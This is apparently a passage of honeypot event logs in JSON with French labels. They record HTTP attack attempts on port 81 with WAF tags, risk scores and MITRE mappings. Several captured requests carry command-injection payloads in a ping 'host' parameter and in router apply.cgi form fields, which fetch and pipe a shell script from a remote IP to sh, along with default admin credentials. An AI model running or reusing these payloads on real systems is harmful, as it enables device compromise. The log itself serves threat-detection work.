\u00227f6c53798c5bb6fd8bf00e7ecae2889ecce3bcd1\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20genie%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20genie%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20genie%\u2026\u0022, \u0022request_line\u0022: \u0022GET \/api\/ping?host=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20genie%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20genie%3Bcurl%20http:\/\/91.92.40.118\/wget.s\u2026\u0022, \u0022port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022GET \/api\/ping?host=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20genie%3Bbusybox%20wget%20http:\/\/91.92.40.\u0022, \u0022attack_vector\u0022: \u0022lfi path traversal \u00b7 via HTTP:81 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/wget.sh%20-O-%7Csh%20-s%20genie%3Bbusybox%20wg\u2026\u0022, \u0022target_port_label\u0022: \u002281 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 59 % \u2014 9 tag(s) WAF\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Type \u00ab lfi_path_traversal \u00bb (signaux protocolaires) \u00b7 confiance 59%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Type \u00ab lfi_path_traversal \u00bb (signaux protocolaires) \u00b7 confiance 59%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 60\/100 (Moyen) \u2014 MITRE TA0001 \u2014 confiance 59 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 59, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 78.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 30.0, \u0022risk_score\u0022: 60}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 60, \u0022risk_label\u0022: \u0022Moyen\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 81, \u0022protocol_emulated\u0022: true, \u0022tags_summary\u0022: [\u0022CRS-930100-sub\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022CRS-930100-sub\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022TA0001\u0022, \u0022mitre_technique\u0022: \u0022TA0001\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20genie%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20genie%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20genie%\u2026\u0022, \u0022request_line\u0022: \u0022GET \/api\/ping?host=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20genie%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20genie%3Bcurl%20http:\/\/91.92.40.118\/wget.s\u2026\u0022, \u0022port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022lfi path traversal \u00b7 via HTTP:81 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/wget.sh%20-O-%7Csh%20-s%20genie%3Bbusybox%20wg\u2026\u0022, \u0022evidence_snippet\u0022: \u0022GET \/api\/ping?host=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20genie%3Bbusybox%20wget%20http:\/\/91.92.40.\u0022, \u0022target_port_label\u0022: \u002281 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 59 % \u2014 9 tag(s) WAF\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 59 % \u2014 Score WAF 100 \u00b7 9 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022meta_truncated\u0022: true, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u002281\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022950600:k8s-api\u0022, \u0022anomaly:high-entropy-query\u0022, \u0022http_idor_probe\u0022, \u0022http_no_ua\u0022, \u0022http_probe_api\u0022, \u0022http_suspicious_params\u0022, \u0022net_web_probe\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:81","http_user_agent":null,"http_referer":null,"tags":"[\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022950600:k8s-api\u0022, \u0022anomaly:high-entropy-query\u0022, \u0022http_idor_probe\u0022, \u0022http_no_ua\u0022, \u0022http_probe_api\u0022, \u0022http_suspicious_params\u0022, \u0022net_web_probe\u0022]","anomalies":"[\u0022high-entropy-query\u0022]","severity":10,"bytes_in":274},{"id":11860749,"ip":"45.156.87.213","ts":"2026-07-14 08:22:33.000000","proto":"tcp","src_port":59744,"dst_port":81,"service":"http","classification":"cmd_injection","waf_score":34,"waf_tags":"[\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022]","http_method":"POST","http_target":"\/apply.cgi","sensor_id":"paris-1","meta":"{\u0022protocol_emulated\u0022: true, \u0022emulator_response\u0022: \u0022485454502f312e3120323030204f4b0d0a5365727665723a204170616368652f322e342e35370d0a436f6e74656e742d4c656e6774683a20320d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a4f4b\u0022, \u0022emulator_response_len\u0022: 82, \u0022http_header_count\u0022: 5, \u0022http_query_params\u0022: 0, \u0022http_path_depth\u0022: 1, \u0022http_path_ext\u0022: \u0022cgi\u0022, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u0022f257870e26046e30cbd03e9d5726ca53aa58b86f\u0022, \u0022http_target_hash\u0022: \u002231402cc48ac7ac052e1d50fc94349665a12c2c45\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022POST\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 432, \u0022payload_entropy\u0022: 5.343965267045786, \u0022port_category\u0022: \u0022well_known\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 81, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 85.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 43.0, \u0022risk_novelty\u0022: 25.0, \u0022risk_boost\u0022: 15, \u0022risk_granularity\u0022: 6.0, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0}, \u0022risk_score\u0022: 81, \u0022tag_count\u0022: 12, \u0022anomaly_count\u0022: 0, \u0022campaign_key\u0022: \u0022c663587837d67542a087ce7094dc34ab8bb0d503\u0022, \u0022event_fingerprint\u0022: \u002256676a028215adbb9fe1a2810691321f4a0be942\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022confidence\u0022: 1.0, \u0022classification_confidence\u0022: 1.0, \u0022precision_score\u0022: 142, \u0022precision_signals\u0022: [\u0022INT-http_cmdi\u0022, \u0022pat-0146\u0022], \u0022kb_rule_ids\u0022: [\u0022INT-http_cmdi\u0022, \u0022pat-0146\u0022], \u0022matched_patterns\u0022: [\u0022pat-0842\u0022, \u0022pat-0463\u0022, \u0022pat-0146\u0022], \u0022matched_pattern_names\u0022: [\u0022CRS 921130 duplicate CL\u0022, \u0022Cred Basic auth spray\u0022, \u0022CRS 932205\u0022], \u0022pattern_ids\u0022: [\u0022pat-0842\u0022, \u0022pat-0463\u0022, \u0022pat-0146\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 81}, \u0022named_classification_skipped\u0022: false, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 100.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u0022291d350ff3b85c826d5d603c954793cc\u0022, \u0022path_pattern_hash\u0022: \u0022b3e1dfd605a877958cebee595444f5d1\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 81}, \u0022payload_preview\u0022: \u0022POST \/apply.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nContent-Type: application\/x-www-form-urlen\u0022, \u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/apply.cgi\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/apply.cgi HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/apply.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 255\\r\\nConnection: close\\r\\n\\r\\naction=Apply\u0026change_action=gozila_cgi\u0026submit_type=\u0026pptp_ip=cd%20\/tmp%3Bwget%20h\u0022, \u0022payload_snippet\u0022: \u0022POST \/apply.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nContent-Type: application\/x-www-form-urlen\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/apply.cgi\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/apply.cgi HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/apply.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 255\\r\\nConnection: close\\r\\n\\r\\naction=Apply\u0026change_action=gozila_cgi\u0026submit_type=\u0026pptp_ip=cd%20\/tmp%3Bwget%20h\u0022, \u0022payload_snippet\u0022: \u0022POST \/apply.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nContent-Type: application\/x-www-form-urlen\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre_techniques\u0022: [\u0022T1059\u0022, \u0022T1190\u0022], \u0022mitre\u0022: \u0022T1059\u0022, \u0022threat_family\u0022: [\u0022rce_probe\u0022, \u0022ssrf_probe\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u0022068ab9ed699ad0f99c9edcbec2b2d7c14bc73d59\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/apply.cgi\u0022, \u0022request_line\u0022: \u0022POST \/apply.cgi HTTP\/1.1\u0022, \u0022port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022POST \/apply.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nContent-Type: application\/x-www-form-urlen\u0022, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:81 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/apply.cgi\u0022, \u0022target_port_label\u0022: \u002281 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 81\/100 (\u00c9lev\u00e9) \u2014 MITRE T1059 \u2014 confiance 100 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 100, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 81}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 81, \u0022risk_label\u0022: \u0022\u00c9lev\u00e9\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 81, \u0022protocol_emulated\u0022: true, \u0022tags_summary\u0022: [\u0022INT-http_cmdi\u0022, \u0022pat-0146\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022Http Cmdi\u0022, \u0022pat-0146\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022T1059\u0022, \u0022mitre_technique\u0022: \u0022T1059\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/apply.cgi\u0022, \u0022request_line\u0022: \u0022POST \/apply.cgi HTTP\/1.1\u0022, \u0022port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:81 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/apply.cgi\u0022, \u0022evidence_snippet\u0022: \u0022POST \/apply.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nContent-Type: application\/x-www-form-urlen\u0022, \u0022target_port_label\u0022: \u002281 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 100 % \u2014 Score WAF 100 \u00b7 5 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u002281\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_auth_header_token\u0022, \u0022http_basic_auth\u0022, \u0022http_cmd_injection\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_ssrf_body\u0022, \u0022net_web_probe\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:81","http_user_agent":null,"http_referer":null,"tags":"[\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_auth_header_token\u0022, \u0022http_basic_auth\u0022, \u0022http_cmd_injection\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_ssrf_body\u0022, \u0022net_web_probe\u0022]","anomalies":"[]","severity":10,"bytes_in":432},{"id":11860750,"ip":"45.156.87.213","ts":"2026-07-14 08:22:33.000000","proto":"tcp","src_port":59746,"dst_port":81,"service":"http","classification":"http_smuggling_probe","waf_score":34,"waf_tags":"[\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022]","http_method":"POST","http_target":"\/apply.cgi","sensor_id":"paris-1","meta":"{\u0022protocol_emulated\u0022: true, \u0022emulator_response\u0022: \u0022485454502f312e3120323030204f4b0d0a5365727665723a204170616368652f322e342e35370d0a436f6e74656e742d4c656e6774683a20320d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a4f4b\u0022, \u0022emulator_response_len\u0022: 82, \u0022http_header_count\u0022: 4, \u0022http_query_params\u0022: 0, \u0022http_path_depth\u0022: 1, \u0022http_path_ext\u0022: \u0022cgi\u0022, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u0022f257870e26046e30cbd03e9d5726ca53aa58b86f\u0022, \u0022http_target_hash\u0022: \u002231402cc48ac7ac052e1d50fc94349665a12c2c45\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022POST\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 381, \u0022payload_entropy\u0022: 5.2926477598305866, \u0022port_category\u0022: \u0022well_known\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 81, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 85.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 43.0, \u0022risk_novelty\u0022: 25.0, \u0022risk_boost\u0022: 15, \u0022risk_granularity\u0022: 6.0, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0}, \u0022risk_score\u0022: 79, \u0022tag_count\u0022: 9, \u0022anomaly_count\u0022: 0, \u0022campaign_key\u0022: \u00220b8c7099fd5320881a1892c5223105ead4481967\u0022, \u0022event_fingerprint\u0022: \u002256676a028215adbb9fe1a2810691321f4a0be942\u0022, \u0022classification_reason\u0022: \u0022Motif SSRF \u00b7 confiance 95%\u0022, \u0022confidence\u0022: 0.95, \u0022classification_confidence\u0022: 0.95, \u0022precision_score\u0022: 84, \u0022precision_signals\u0022: [\u0022pat-0842\u0022], \u0022kb_rule_ids\u0022: [\u0022pat-0842\u0022], \u0022matched_patterns\u0022: [\u0022pat-0842\u0022, \u0022pat-0103\u0022], \u0022matched_pattern_names\u0022: [\u0022CRS 921130 duplicate CL\u0022, \u0022LFI Double-dot bypass\u0022], \u0022pattern_ids\u0022: [\u0022pat-0842\u0022, \u0022pat-0103\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 79}, \u0022named_classification_skipped\u0022: false, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 95.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u0022238c37ba54bcba6bc2e6f7a9b58f8cdb\u0022, \u0022path_pattern_hash\u0022: \u0022b3e1dfd605a877958cebee595444f5d1\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 79}, \u0022payload_preview\u0022: \u0022POST \/apply.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 243\\r\\nConnection:\u0022, \u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/apply.cgi\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/apply.cgi HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/apply.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 243\\r\\nConnection: close\\r\\n\\r\\nwl_ssid=cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lwizard%3Bbusybox%20wget%20http:\/\/91.92.40.11\u0022, \u0022payload_snippet\u0022: \u0022POST \/apply.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 243\\r\\nConnection:\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/apply.cgi\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, 